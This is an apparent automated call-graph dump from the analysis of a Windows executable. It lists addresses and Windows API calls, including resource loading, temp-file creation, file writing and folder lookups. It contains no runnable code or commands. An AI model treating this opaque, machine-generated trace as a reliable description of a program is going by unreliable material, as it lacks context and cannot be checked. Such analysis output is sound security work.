SetLastError 8629->9540 8637 403582 8630->8637 8633 4035cc 9518 40aeba 8633->9518 8634 403578 8643 40e560 3 API calls 8634->8643 8635 40362a 9537 40e520 GetLastError TlsGetValue SetLastError 8635->9537 9505 40e520 GetLastError TlsGetValue SetLastError 8637->9505 8638 4035ff 8649 40aeba 17 API calls 8638->8649 8639 40365d 9539 40e520 GetLastError TlsGetValue SetLastError 8639->9539 8647 4036f0 8640->8647 8648 403719 8640->8648 9542 40e520 GetLastError TlsGetValue SetLastError 8641->9542 8643->8637 8645 403632 8653 40aeba 17 API calls 8645->8653 8646 403690 9541 40e520 GetLastError TlsGetValue SetLastError 8646->9541 9544 40e520 GetLastError TlsGetValue SetLastError 8647->9544 8660 403723 8648->8660 8661 403749 8648->8661 8657 40360b 8649->8657 8663 40363e 8653->8663 8669 40e560 3 API calls 8657->8669 8658 403665 8670 40aeba 17 API calls 8658->8670 8659 4036c3 9543 40e520 GetLastError TlsGetValue SetLastError 8659->9543 9546 40e520 GetLastError TlsGetValue SetLastError 8660->9546 8667 4037a1 8661->8667 8668 403753 8661->8668 8662 40e560 3 API calls 8721 4035e2 8662->8721 8674 40e560 3 API calls 8663->8674 8664 4037cb 8675 40e6c0 4 API calls 8664->8675 8665 403698 8676 40aeba 17 API calls 8665->8676 8666 4036f6 9545 40e520 GetLastError TlsGetValue SetLastError 8666->9545 9576 40e520 GetLastError TlsGetValue SetLastError 8667->9576 9548 40e520 GetLastError TlsGetValue SetLastError 8668->9548 8669->8721 8680 403671 8670->8680 8673 403729 9547 40e520 GetLastError TlsGetValue SetLastError 8673->9547 8674->8721 8683 4037d3 8675->8683 8684 4036a4 8676->8684 8688 40e560 3 API calls 8680->8688 8681 4036cb 8689 40aeba 17 API calls 8681->8689 9506 405170 TlsGetValue 8683->9506 8693 40e560 3 API calls 8684->8693 8685 4036fe 8694 40aeba 17 API calls 8685->8694 8686 403759 9549 40e520 GetLastError TlsGetValue SetLastError 8686->9549 8687 4037a7 9577 40e520 GetLastError TlsGetValue SetLastError 8687->9577 8688->8721 8690 4036d7 8689->8690 8697 40e560 3 API calls 8690->8697 8691 403731 8698 40aeba 17 API calls 8691->8698 8693->8721 8700 40370a 8694->8700 8697->8721 8703 40373d 8698->8703 8699 4037da 8708 40e5f0 RtlFreeHeap 8699->8708 8704 40e560 3 API calls 8700->8704 8701 403761 9550 409355 8701->9550 8702 4037af 8706 40ae75 5 API calls 8702->8706 8707 40e560 3 API calls 8703->8707 8704->8721 8710 4037b6 8706->8710 8707->8721 8712 4037f2 8708->8712 8711 40e560 3 API calls 8710->8711 8711->8637 8715 40e5f0 RtlFreeHeap 8712->8715 8713 40e560 3 API calls 8714 40377c 8713->8714 8717 403795 8714->8717 8718 403789 8714->8718 8716 4037fa 8715->8716 8716->7824 8720 401fba 36 API calls 8717->8720 9573 4056d8 8718->9573 8720->8721 8721->8637 8722->7828 8723->7830 8725 40e660 21 API calls 8724->8725 8726 402bb0 8725->8726 8727 4051a0 3 API calls 8726->8727 8728 402bb9 8727->8728 8729 405060 2 API calls 8728->8729 8730 402bc5 8729->8730 8731 40a220 RtlAllocateHeap 8730->8731 8732 402bcf GetShortPathNameW 8731->8732 9587 40e520 GetLastError TlsGetValue SetLastError 8732->9587 8734 402beb 9588 40e520 GetLastError TlsGetValue SetLastError 8734->9588 8736 402bf3 8737 40a290 5 API calls 8736->8737 8738 402c03 8737->8738 8739 40e560 3 API calls 8738->8739 8740 402c0d 8739->8740 9589 40a200 HeapFree 8740->9589 8742 402c16 9590 40e520 GetLastError TlsGetValue SetLastError 8742->9590 8744 402c20 8745 40e6c0 4 API calls 8744->8745 8746 402c28 8745->8746 9591 405170 TlsGetValue 8746->9591 8748 402c2f 8749 40e5f0 RtlFreeHeap 8748->8749 8750 402c46 8749->8750 8751 40e5f0 RtlFreeHeap 8750->8751 8752 402c4f 8751->8752 8753 40e720 TlsGetValue 8752->8753 8753->7834 8754->7836 8756 404594 8755->8756 8757 4099ac SetEnvironmentVariableW 8755->8757 8756->7839 8757->8756 8759->7842 8761 403807 8760->8761 8761->8761 8762 40e660 21 API calls 8761->8762 8781 403819 8762->8781 8763 40389a 9592 40e520 GetLastError TlsGetValue SetLastError 8763->9592 8765 4038a0 9593 40e520 GetLastError TlsGetValue SetLastError 8765->9593 8767 4038a8 9594 40e520 GetLastError TlsGetValue SetLastError 8767->9594 8768 405dc0 3 API calls 8768->8781 8770 4038b0 9595 40e520 GetLastError TlsGetValue SetLastError 8770->9595 8771 40e560 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8771->8781 8773 4038b8 8775 40d780 8 API calls 8773->8775 8774 40e520 GetLastError TlsGetValue SetLastError 8774->8781 8776 4038ca 8775->8776 9596 405182 TlsGetValue 8776->9596 8777 40e6c0 wcslen TlsGetValue RtlReAllocateHeap HeapReAlloc 8777->8781 8779 4038cf 8780 405eb0 6 API calls 8779->8780 8782 4038d7 8780->8782 8781->8763 8781->8768 8781->8771 8781->8774 8781->8777 8783 40e560 3 API calls 8782->8783 8784 4038e1 8783->8784 9597 40e520 GetLastError TlsGetValue SetLastError 8784->9597 8786 4038e7 9598 40e520 GetLastError TlsGetValue SetLastError 8786->9598 8788 4038ef 9599 40e520 GetLastError TlsGetValue SetLastError 8788->9599 8790 4038f7 9600 40e520 GetLastError TlsGetValue SetLastError 8790->9600 8792 4038ff 8793 40d780 8 API calls 8792->8793 8794 403911 8793->8794 9601 405182 TlsGetValue 8794->9601 8796 403916 8797 405eb0 6 API calls 8796->8797 8798 40391e 8797->8798 8799 40e560 3 API calls 8798->8799 8800 403928 8799->8800 9602 40e520 GetLastError TlsGetValue SetLastError 8800->9602 8802 40392e 9603 40e520 GetLastError TlsGetValue SetLastError 8802->9603 8804 403936 9604 40e520 GetLastError TlsGetValue SetLastError 8804->9604 8806 40393e 9605 40e520 GetLastError TlsGetValue SetLastError 8806->9605 8808 403946 8809 40d780 8 API calls 8808->8809 8810 403956 8809->8810 9606 405182 TlsGetValue 8810->9606 8812 40395b 8813 405eb0 6 API calls 8812->8813 8814 403963 8813->8814 8815 40e560 3 API calls 8814->8815 8816 40396d 8815->8816 9607 40e520 GetLastError TlsGetValue SetLastError 8816->9607 8818 403973 9608 40e520 GetLastError TlsGetValue SetLastError 8818->9608 8820 40397b 9609 40e520 GetLastError TlsGetValue SetLastError 8820->9609 8822 403983 9610 40e520 GetLastError TlsGetValue SetLastError 8822->9610 8824 40398b 8825 40d780 8 API calls 8824->8825 8826 40399b 8825->8826 9611 405182 TlsGetValue 8826->9611 8828 4039a0 8829 405eb0 6 API calls 8828->8829 8830 4039a8 8829->8830 8831 40e560 3 API calls 8830->8831 8832 4039b2 8831->8832 9612 40e520 GetLastError TlsGetValue SetLastError 8832->9612 8834 4039b8 9613 40e520 GetLastError TlsGetValue SetLastError 8834->9613 8836 4039c0 9614 40e520 GetLastError TlsGetValue SetLastError 8836->9614 8838 4039c8 9615 40e520 GetLastError TlsGetValue SetLastError 8838->9615 8840 4039d0 8841 40d780 8 API calls 8840->8841 8842 4039e0 8841->8842 9616 405182 TlsGetValue 8842->9616 8844 4039e5 8845 405eb0 6 API calls 8844->8845 8846 4039ed 8845->8846 8847 40e560 3 API calls 8846->8847 8848 4039f7 8847->8848 9617 40e520 GetLastError TlsGetValue SetLastError 8848->9617 8850 4039fd 9618 403e37 8850->9618 8853 4051a0 3 API calls 8854 403a12 8853->8854 9659 40e520 GetLastError TlsGetValue SetLastError 8854->9659 8856 403a18 8857 403e37 84 API calls 8856->8857 8858 403a28 8857->8858 8859 40e560 3 API calls 8858->8859 8860 403a34 8859->8860 9660 40e520 GetLastError TlsGetValue SetLastError 8860->9660 8862 403a3a 8863 403e37 84 API calls 8862->8863 8864 403a4a 8863->8864 8865 40e560 3 API calls 8864->8865 8866 403a54 8865->8866 9661 40e520 GetLastError TlsGetValue SetLastError 8866->9661 8868 403a5a 8869 403e37 84 API calls 8868->8869 8870 403a6a 8869->8870 8871 40e560 3 API calls 8870->8871 8872 403a74 8871->8872 9662 40e520 GetLastError TlsGetValue SetLastError 8872->9662 8874 403a7a 8875 403e37 84 API calls 8874->8875 8876 403a8a 8875->8876 8877 40e560 3 API calls 8876->8877 8878 403a94 8877->8878 9663 40e520 GetLastError TlsGetValue SetLastError 8878->9663 8880 403a9a 9664 40e520 GetLastError TlsGetValue SetLastError 8880->9664 8882 403aa2 9665 40e520 GetLastError TlsGetValue SetLastError 8882->9665 8884 403aaa 8885 402ba6 43 API calls 8884->8885 8886 403ab7 8885->8886 9666 40e720 TlsGetValue 8886->9666 8888 403abc 9667 405182 TlsGetValue 8888->9667 8890 403acb 9668 406650 8890->9668 8893 40e560 3 API calls 8894 403ade 8893->8894 9671 40e520 GetLastError TlsGetValue SetLastError 8894->9671 8896 403ae4 9672 40e520 GetLastError TlsGetValue SetLastError 8896->9672 8898 403aec 9673 40e520 GetLastError TlsGetValue SetLastError 8898->9673 8900 403af4 8901 402ba6 43 API calls 8900->8901 8902 403b01 8901->8902 9674 40e720 TlsGetValue 8902->9674 8904 403b06 9675 405182 TlsGetValue 8904->9675 8906 403b15 8907 406650 13 API calls 8906->8907 8908 403b1e 8907->8908 8909 40e560 3 API calls 8908->8909 8910 403b28 8909->8910 9676 40e520 GetLastError TlsGetValue SetLastError 8910->9676 8912 403b2e 9677 40e520 GetLastError TlsGetValue SetLastError 8912->9677 8914 403b3a 8915 40e6c0 4 API calls 8914->8915 8916 403b42 8915->8916 8917 40e6c0 4 API calls 8916->8917 8918 403b4d 8917->8918 8919 40e6c0 4 API calls 8918->8919 8920 403b57 8919->8920 8921 40e6c0 4 API calls 8920->8921 8922 403b61 8921->8922 8923 40e6c0 4 API calls 8922->8923 8924 403b6b 8923->8924 9678 40e720 TlsGetValue 8924->9678 8926 403b70 9679 405182 TlsGetValue 8926->9679 8928 403b7b 9680 4023b8 8928->9680 8931 4051a0 3 API calls 8932 403b89 8931->8932 8933 40e5f0 RtlFreeHeap 8932->8933 8934 403b94 8933->8934 8935 40e5f0 RtlFreeHeap 8934->8935 8936 403b9d 8935->8936 8937 40e5f0 RtlFreeHeap 8936->8937 8938 403ba6 8937->8938 8939 40e5f0 RtlFreeHeap 8938->8939 8940 403baf 8939->8940 8941 40e5f0 RtlFreeHeap 8940->8941 8942 403bb8 8941->8942 8943 40e5f0 RtlFreeHeap 8942->8943 8944 403bc1 8943->8944 8945 40e5f0 RtlFreeHeap 8944->8945 8946 403bca 8945->8946 8947 40e5f0 RtlFreeHeap 8946->8947 8948 403bd3 8947->8948 8949 40e5f0 RtlFreeHeap 8948->8949 8950 403bdc 8949->8950 8951 40e5f0 RtlFreeHeap 8950->8951 8952 403be5 8951->8952 8953 40e520 GetLastError TlsGetValue SetLastError 8952->8953 8953->7852 8955 40e660 21 API calls 8954->8955 8956 401e70 8955->8956 8957 4051a0 3 API calls 8956->8957 8958 401e79 8957->8958 9888 40e520 GetLastError TlsGetValue SetLastError 8958->9888 8960 401e7f 9889 40e520 GetLastError TlsGetValue SetLastError 8960->9889 8962 401e87 8963 409698 7 API calls 8962->8963 8964 401e8e 8963->8964 8965 40e560 3 API calls 8964->8965 8966 401e98 PathQuoteSpacesW 8965->8966 8967 401ef1 8966->8967 8968 401ea8 8966->8968 9956 40e520 GetLastError TlsGetValue SetLastError 8967->9956 9890 40e520 GetLastError TlsGetValue SetLastError 8968->9890 8971 401eae 9891 40249d 8971->9891 8972 401efa 8974 40e6c0 4 API calls 8972->8974 8976 401f02 8974->8976 8978 40e560 3 API calls 8976->8978 8977 40e560 3 API calls 8997 401eef 8978->8997 8983 401f16 8985 40e6c0 4 API calls 8983->8985 8987 401f1e 8985->8987 9958 405170 TlsGetValue 8987->9958 8992 401f25 8993 40e5f0 RtlFreeHeap 8992->8993 8996 401f3c 8993->8996 8998 40e5f0 RtlFreeHeap 8996->8998 9957 40e520 GetLastError TlsGetValue SetLastError 8997->9957 8999 401f45 8998->8999 8999->7855 9001 40e660 21 API calls 9000->9001 9002 403c91 9001->9002 9003 405060 2 API calls 9002->9003 9004 403c9d 9003->9004 9005 405060 2 API calls 9004->9005 9006 403caa 9005->9006 9007 405060 2 API calls 9006->9007 9008 403cb7 9007->9008 9009 405060 2 API calls 9008->9009 9010 403cc4 9009->9010 9989 40e520 GetLastError TlsGetValue SetLastError 9010->9989 9012 403cd0 9013 40e6c0 4 API calls 9012->9013 9014 403cd8 9013->9014 9015 40e560 3 API calls 9014->9015 9016 403ce2 PathQuoteSpacesW 9015->9016 9990 40e520 GetLastError TlsGetValue SetLastError 9016->9990 9018 403cf5 9019 40e6c0 4 API calls 9018->9019 9020 403cfd 9019->9020 9085 4054b1 EnterCriticalSection 9084->9085 9086 404601 9084->9086 9087 4054c7 9085->9087 9093 4054f7 9085->9093 9086->7862 9089 4054c8 WaitForSingleObject 9087->9089 9087->9093 9088 40e1f2 HeapAlloc 9091 405511 LeaveCriticalSection 9088->9091 9089->9087 9090 4054d8 CloseHandle 9089->9090 9092 40e1b2 HeapFree 9090->9092 9091->9086 9092->9087 9093->9088 9095 40e660 21 API calls 9094->9095 9096 402c63 9095->9096 9097 405060 2 API calls 9096->9097 9098 402c6f 9097->9098 9099 402c9c 9098->9099 10091 40e520 GetLastError TlsGetValue SetLastError 9098->10091 10093 40e520 GetLastError TlsGetValue SetLastError 9099->10093 9102 402ca2 10094 40e520 GetLastError TlsGetValue SetLastError 9102->10094 9103 402c7e 10092 40e520 GetLastError TlsGetValue SetLastError 9103->10092 9106 402caa 10095 40e520 GetLastError TlsGetValue SetLastError 9106->10095 9107 402c86 9109 40a240 4 API calls 9107->9109 9111 402c92 9109->9111 9110 402cb2 10096 40e520 GetLastError TlsGetValue SetLastError 9110->10096 9112 40e560 3 API calls 9111->9112 9112->9099 9114 402cba 9115 40d780 8 API calls 9114->9115 9116 402cca 9115->9116 10097 405182 TlsGetValue 9116->10097 9118 402ccf 9119 405eb0 6 API calls 9118->9119 9120 402cd7 9119->9120 9121 40e560 3 API calls 9120->9121 9122 402ce1 FindResourceW 9121->9122 9123 402d04 9122->9123 9128 402db0 9122->9128 9124 402664 26 API calls 9123->9124 9125 402d13 9124->9125 9127 402dd8 9128->9127 9129 402dc8 9128->9129 9130 402ddf 9128->9130 9224 40e780 9174->9224 9176 40324e 9176->8277 9178 402b73 9177->9178 9178->9178 9179 40e660 21 API calls 9178->9179 9180 402b85 GetNativeSystemInfo 9179->9180 9181 402b98 9180->9181 9181->8281 9181->8282 9183 4055a1 9182->9183 9187 403269 9182->9187 9183->9187 9227 40552c memset GetModuleHandleW 9183->9227 9186 4055df GetVersionExW 9186->9187 9187->8282 9188->8290 9189->8294 9191 40e900 3 API calls 9190->9191 9192 40329b 9191->9192 9192->8299 9193->8304 9194->8319 9195->8335 9230 40db18 EnterCriticalSection 9196->9230 9198 40b455 9199 40b4ee 9198->9199 9200 40b45f CreateFileW 9198->9200 9199->8346 9201 40b480 9200->9201 9203 40b4a0 9200->9203 9201->9203 9204 40b48d HeapAlloc 9201->9204 9205 40b4e5 9203->9205 9240 40da8a EnterCriticalSection 9203->9240 9204->9203 9205->8346 9207 40b069 9206->9207 9208 40b05a 9206->9208 9251 40dad9 EnterCriticalSection 9207->9251 9255 40e075 9208->9255 9213 40b0ad 9213->8347 9214 40b099 FindCloseChangeNotification 9216 40da8a 4 API calls 9214->9216 9216->9213 9217 40b088 HeapFree 9217->9214 9218->8355 9219->8357 9220->8289 9221->8293 9222->8306 9223->8314 9225 40e7c7 9224->9225 9226 40e78a wcslen RtlAllocateHeap 9224->9226 9225->9176 9226->9225 9228 405554 GetProcAddress 9227->9228 9229 405564 9227->9229 9228->9229 9229->9186 9229->9187 9231 40db32 9230->9231 9232 40db47 9230->9232 9235 40e1f2 HeapAlloc 9231->9235 9233 40db6c 9232->9233 9234 40db4c HeapReAlloc 9232->9234 9237 40db81 HeapAlloc 9233->9237 9238 40db75 9233->9238 9234->9233 9236 40db41 9235->9236 9239 40db9d LeaveCriticalSection 9236->9239 9237->9238 9238->9239 9239->9198 9241 40dac1 9240->9241 9242 40daa2 9240->9242 9248 40e1b2 9241->9248 9242->9241 9243 40daa7 9242->9243 9245 40dab0 memset 9243->9245 9246 40dacd LeaveCriticalSection 9243->9246 9245->9246 9246->9205 9247 40dacb 9247->9246 9249 40e1c3 HeapFree 9248->9249 9249->9247 9252 40daf2 9251->9252 9253 40dafd LeaveCriticalSection 9251->9253 9252->9253 9254 40b076 9253->9254 9254->9213 9254->9214 9261 40b0c0 9254->9261 9256 40e082 9255->9256 9257 40b065 9255->9257 9264 40e19b EnterCriticalSection 9256->9264 9257->8347 9260 40e088 9260->9257 9265 40e144 9260->9265 9262 40b0d4 WriteFile 9261->9262 9263 40b0fc 9261->9263 9262->9217 9263->9217 9264->9260 9267 40e150 9265->9267 9266 40e194 9266->9260 9267->9266 9268 40e18a LeaveCriticalSection 9267->9268 9268->9266 9270 40e660 21 API calls 9269->9270 9271 40266d LoadResource SizeofResource 9270->9271 9272 40a220 RtlAllocateHeap 9271->9272 9273 40269a 9272->9273 9286 40a300 memcpy 9273->9286 9275 4026b1 FreeResource 9276 4026c1 9275->9276 9277 40477d 9276->9277 9287 40a1e0 9277->9287 9279 404786 9279->8378 9281 40a228 RtlAllocateHeap 9280->9281 9282 40a23a 9280->9282 9281->8382 9282->8382 9290 40ee80 9283->9290 9285 402ed0 9285->8386 9286->9275 9288 40a1e8 HeapSize 9287->9288 9289 40a1fa 9287->9289 9288->9279 9289->9279 9291 40ee98 __fprintf_l 9290->9291 9293 40ef4a __fprintf_l 9291->9293 9294 40eff0 9291->9294 9293->9285 9295 40fa52 9294->9295 9299 40f000 __fprintf_l 9294->9299 9295->9291 9296 40f5d7 9300 40f644 __fprintf_l 9296->9300 9301 410b90 9296->9301 9298 40f4ef memcpy 9298->9299 9299->9295 9299->9296 9299->9298 9300->9291 9302 410ba4 9301->9302 9303 410c12 memcpy 9302->9303 9304 410bec memcpy 9302->9304 9306 410bbf 9302->9306 9307 410c39 memcpy 9303->9307 9308 410c58 9303->9308 9304->9300 9306->9300 9307->9300 9308->9300 9309->8396 9310->8400 9311->8404 9312->8407 9314 40a2a9 9313->9314 9315 40a299 9313->9315 9317 40e900 3 API calls 9314->9317 9417 40a240 9315->9417 9320 40a2bf 9317->9320 9318 40a2a6 9318->8412 9423 40ea90 TlsGetValue 9320->9423 9321 40a2e8 9321->8412 9322->8416 9424 405f90 9323->9424 9325 4021bd 9325->8421 9326->8425 9327->8427 9328->8429 9329->8431 9330->8435 9331->8441 9332->8443 9333->8445 9334->8447 9336 40590f 9335->9336 9343 405801 9335->9343 9434 40e9e0 TlsGetValue 9336->9434 9338 405918 9338->8449 9339 405886 9341 40e880 TlsGetValue 9339->9341 9340 405850 wcsncmp 9340->9343 9342 4058c7 9341->9342 9344 4058e9 9342->9344 9433 40e8d0 TlsGetValue 9342->9433 9343->9339 9343->9340 9346 40e900 3 API calls 9344->9346 9348 4058f0 9346->9348 9347 4058d7 memmove 9347->9344 9349 405901 9348->9349 9350 4058f6 wcsncpy 9348->9350 9349->8449 9350->9349 9351->8451 9352->8453 9353->8455 9354->8459 9355->8461 9435 408e58 9356->9435 9358 408f81 9359 408e58 3 API calls 9358->9359 9360 408f90 9359->9360 9361 408e58 3 API calls 9360->9361 9362 408fa3 9361->9362 9363 408fb0 GetStockObject 9362->9363 9364 408fbd LoadIconW LoadCursorW RegisterClassExW 9362->9364 9363->9364 9439 4094d1 GetForegroundWindow 9364->9439 9369 409047 IsWindowEnabled 9370 40906b 9369->9370 9371 409052 EnableWindow 9369->9371 9372 4094d1 3 API calls 9370->9372 9371->9370 9373 40907e GetSystemMetrics GetSystemMetrics CreateWindowExW 9372->9373 9374 4092ba 9373->9374 9375 4090cb SetWindowLongW CreateWindowExW SendMessageW 9373->9375 9376 4092cd 9374->9376 9453 40e9e0 TlsGetValue 9374->9453 9377 409125 9375->9377 9378 409128 CreateWindowExW SendMessageW SetFocus 9375->9378 9454 408e9a 9376->9454 9377->9378 9380 4091a5 CreateWindowExW SendMessageW CreateAcceleratorTableW SetForegroundWindow BringWindowToTop 9378->9380 9381 40917b SendMessageW wcslen wcslen SendMessageW 9378->9381 9384 40926a 9380->9384 9381->9380 9386 409273 9384->9386 9387 40922e GetMessageW 9384->9387 9385 408e9a HeapFree 9388 4092df 9385->9388 9390 409277 DestroyAcceleratorTable 9386->9390 9391 40927e 9386->9391 9387->9386 9389 409243 TranslateAcceleratorW 9387->9389 9392 408e9a HeapFree 9388->9392 9389->9384 9393 409254 TranslateMessage DispatchMessageW 9389->9393 9390->9391 9391->9374 9394 409285 wcslen 9391->9394 9395 4092e5 9392->9395 9393->9384 9396 40e900 3 API calls 9394->9396 9395->8463 9397 40929c wcscpy HeapFree 9396->9397 9397->9374 9398->8470 9399->8472 9400->8474 9401->8476 9402->8480 9403->8487 9404->8489 9405->8491 9406->8495 9407->8497 9409 4094d1 3 API calls 9408->9409 9410 408e2d 9409->9410 9411 409588 16 API calls 9410->9411 9412 408e36 MessageBoxW 9411->9412 9413 409588 16 API calls 9412->9413 9414 40234b 9413->9414 9414->8500 9415->8397 9416->8405 9418 40a24d 9417->9418 9419 40e900 3 API calls 9418->9419 9420 40a26b 9419->9420 9421 40a271 memcpy 9420->9421 9422 40a27f 9420->9422 9421->9422 9422->9318 9423->9321 9426 405fa1 9424->9426 9425 40e880 TlsGetValue 9427 406014 9425->9427 9426->9425 9426->9426 9428 40e900 3 API calls 9427->9428 9429 406022 9428->9429 9431 406032 9429->9431 9432 40ea10 TlsGetValue 9429->9432 9431->9325 9432->9431 9433->9347 9434->9338 9436 408e60 wcslen HeapAlloc 9435->9436 9437 408e96 9435->9437 9436->9437 9438 408e86 wcscpy 9436->9438 9437->9358 9438->9358 9440 409032 9439->9440 9441 4094e2 GetWindowThreadProcessId GetCurrentProcessId 9439->9441 9442 409588 9440->9442 9441->9440 9443 409592 EnumWindows 9442->9443 9451 4095dd 9442->9451 9444 4095af 9443->9444 9449 40903e 9443->9449 9457 409507 GetWindowThreadProcessId GetCurrentThreadId 9443->9457 9446 4095b1 GetCurrentThreadId 9444->9446 9447 4095c4 SetWindowPos 9444->9447 9444->9449 9445 4095ea GetCurrentThreadId 9445->9451 9446->9444 9447->9444 9448 409600 EnableWindow 9448->9451 9449->9369 9449->9370 9450 409611 SetWindowPos 9450->9451 9451->9445 9451->9448 9451->9449 9451->9450 9452 40e1b2 HeapFree 9451->9452 9452->9451 9453->9376 9455 408ea1 HeapFree 9454->9455 9456 408eb3 9454->9456 9455->9456 9456->9385 9458 409525 IsWindowVisible 9457->9458 9459 40957f 9457->9459 9458->9459 9460 409530 9458->9460 9461 40e1f2 HeapAlloc 9460->9461 9462 40953c GetCurrentThreadId GetWindowLongW 9461->9462 9463 40955a 9462->9463 9464 40955e GetForegroundWindow 9462->9464 9463->9464 9464->9459 9465 409568 IsWindowEnabled 9464->9465 9465->9459 9466 409573 EnableWindow 9465->9466 9466->9459 9467->8509 9468->8512 9470 40e900 3 API calls 9469->9470 9471 40ade9 GetTempPathW LoadLibraryW 9470->9471 9472 40ae24 9471->9472 9473 40ae06 GetProcAddress 9471->9473 9495 40ea90 TlsGetValue 9472->9495 9474 40ae16 GetLongPathNameW 9473->9474 9475 40ae1d FreeLibrary 9473->9475 9474->9475 9475->9472 9477 401a1e 9477->8517 9478->8520 9479->8524 9496 40ae39 9480->9496 9483 40ad45 9484 40ad54 wcsncpy wcslen 9483->9484 9485 401a7b GetTempFileNameW 9483->9485 9486 40ad88 CreateDirectoryW 9484->9486 9488 40e520 GetLastError TlsGetValue SetLastError 9485->9488 9486->9485 9488->8534 9489->8536 9490->8546 9491->8548 9492->8556 9493->8558 9494->8564 9495->9477 9497 40ae40 9496->9497 9498 401a70 9496->9498 9499 40ae56 DeleteFileW 9497->9499 9500 40ae47 SetFileAttributesW 9497->9500 9498->9483 9499->9498 9500->9499 9501->8577 9503 40afe1 SetCurrentDirectoryW 9502->9503 9504 404759 9502->9504 9503->9504 9504->8586 9505->8664 9506->8699 9507->8609 9508->8618 9510 40e900 3 API calls 9509->9510 9511 40ae87 GetCurrentDirectoryW 9510->9511 9512 40ae97 9511->9512 9578 40ea90 TlsGetValue 9512->9578 9514 40aeae 9514->8634 9515->8610 9516->8617 9517->8633 9519 40e900 3 API calls 9518->9519 9520 40aecf 9519->9520 9521 40aede LoadLibraryW 9520->9521 9530 40af69 9520->9530 9523 40af4b 9521->9523 9524 40aeef GetProcAddress 9521->9524 9522 40af9b 9585 40ea90 TlsGetValue 9522->9585 9579 40afec SHGetFolderLocation 9523->9579 9525 40af40 FreeLibrary 9524->9525 9526 40af04 9524->9526 9525->9522 9525->9523 9526->9525 9533 40af16 wcscpy wcscat wcslen CoTaskMemFree 9526->9533 9530->9522 9531 40afec 4 API calls 9530->9531 9531->9522 9532 4035d8 9532->8662 9533->9525 9534->8622 9535->8638 9536->8635 9537->8645 9538->8639 9539->8658 9540->8646 9541->8665 9542->8659 9543->8681 9544->8666 9545->8685 9546->8673 9547->8691 9548->8686 9549->8701 9551 409368 CoInitialize 9550->9551 9552 409379 memset LoadLibraryW 9550->9552 9551->9552 9553 4093a3 GetProcAddress GetProcAddress 9552->9553 9554 4094ab 9552->9554 9555 4093d2 wcsncpy wcslen 9553->9555 9556 4093cd 9553->9556 9557 40e900 3 API calls 9554->9557 9558 409401 9555->9558 9556->9555 9559 4094b8 9557->9559 9560 4094d1 3 API calls 9558->9560 9586 40ea90 TlsGetValue 9559->9586 9561 40941f 9560->9561 9564 409588 16 API calls 9561->9564 9563 403772 9563->8713 9565 409442 9564->9565 9566 409588 16 API calls 9565->9566 9567 409457 9566->9567 9568 40949f FreeLibrary 9567->9568 9569 40e900 3 API calls 9567->9569 9568->9554 9568->9559 9570 409468 CoTaskMemFree wcslen 9569->9570 9570->9568 9572 409493 9570->9572 9572->9568 9574 4056e1 timeBeginPeriod 9573->9574 9575 4056f3 Sleep 9573->9575 9574->9575 9576->8687 9577->8702 9578->9514 9580 40b00b SHGetPathFromIDListW 9579->9580 9581 40af53 wcscat wcslen 9579->9581 9582 40b035 CoTaskMemFree 9580->9582 9583 40b019 wcslen 9580->9583 9581->9522 9582->9581 9583->9582 9584 40b026 9583->9584 9584->9582 9585->9532 9586->9563 9587->8734 9588->8736 9589->8742 9590->8744 9591->8748 9592->8765 9593->8767 9594->8770 9595->8773 9596->8779 9597->8786 9598->8788 9599->8790 9600->8792 9601->8796 9602->8802 9603->8804 9604->8806 9605->8808 9606->8812 9607->8818 9608->8820 9609->8822 9610->8824 9611->8828 9612->8834 9613->8836 9614->8838 9615->8840 9616->8844 9617->8850 9619 40e660 21 API calls 9618->9619 9620 403e43 9619->9620 9621 4051a0 3 API calls 9620->9621 9622 403e4c 9621->9622 9623 405060 2 API calls 9622->9623 9624 403e58 FindResourceW 9623->9624 9625 403f13 9624->9625 9626 403e7b 9624->9626 9748 40e520 GetLastError TlsGetValue SetLastError 9625->9748 9627 402664 26 API calls 9626->9627 9629 403e8a 9627->9629 9631 40477d HeapSize 9629->9631 9630 403f1d 9632 40e6c0 4 API calls 9630->9632 9633 403e97 9631->9633 9634 403f25 9632->9634 9695 4011ef 9633->9695 9749 405170 TlsGetValue 9634->9749 9637 403f2c 9642 40e5f0 RtlFreeHeap 9637->9642 9639 403eba 9731 40478d 9639->9731 9640 403edc 9719 40e520 GetLastError TlsGetValue SetLastError 9640->9719 9645 403f43 9642->9645 9644 403ee2 9720 40e520 GetLastError TlsGetValue SetLastError 9644->9720 9648 40e5f0 RtlFreeHeap 9645->9648 9652 403a0d 9648->9652 9650 403eda 9750 40e750 TlsGetValue 9650->9750 9651 403eea 9721 40a330 9651->9721 9652->8853 9655 403f00 9656 40e560 3 API calls 9655->9656 9657 403f0a 9656->9657 9747 40a200 HeapFree 9657->9747 9659->8856 9660->8862 9661->8868 9662->8874 9663->8880 9664->8882 9665->8884 9666->8888 9667->8890 9827 406310 9668->9827 9671->8896 9672->8898 9673->8900 9674->8904 9675->8906 9676->8912 9677->8914 9678->8926 9679->8928 9681 405060 2 API calls 9680->9681 9682 4023cb 9681->9682 9683 405060 2 API calls 9682->9683 9684 4023d8 9683->9684 9856 40b330 9684->9856 9688 402403 9689 40b050 11 API calls 9688->9689 9690 402410 9689->9690 9691 40e5f0 RtlFreeHeap 9690->9691 9692 402437 9691->9692 9693 40e5f0 RtlFreeHeap 9692->9693 9694 402440 9693->9694 9694->8931 9696 4011f7 9695->9696 9696->9696 9697 405060 2 API calls 9696->9697 9698 401210 9697->9698 9751 405700 9698->9751 9701 40a1e0 HeapSize 9702 401225 9701->9702 9703 40e266 4 API calls 9702->9703 9704 401247 9703->9704 9705 40e266 4 API calls 9704->9705 9706 401265 9705->9706 9707 40e266 4 API calls 9706->9707 9708 4014bd 9707->9708 9709 40e266 4 API calls 9708->9709 9710 4014db 9709->9710 9758 40a200 HeapFree 9710->9758 9712 4014e4 9713 40e5f0 RtlFreeHeap 9712->9713 9714 4014f4 9713->9714 9715 40e3b9 2 API calls 9714->9715 9716 4014fe 9715->9716 9717 40e3b9 2 API calls 9716->9717 9718 401507 9717->9718 9718->9639 9718->9640 9719->9644 9720->9651 9722 40a350 9721->9722 9723 40a3a8 9721->9723 9724 40e900 3 API calls 9722->9724 9725 40a403 MultiByteToWideChar 9723->9725 9726 40a379 9724->9726 9728 40e900 3 API calls 9725->9728 9759 40ea90 TlsGetValue 9726->9759 9730 40a420 MultiByteToWideChar 9728->9730 9729 40a39d 9729->9655 9730->9655 9732 40e660 21 API calls 9731->9732 9733 40479b 9732->9733 9734 405060 2 API calls 9733->9734 9735 4047a7 9734->9735 9736 4047ba 9735->9736 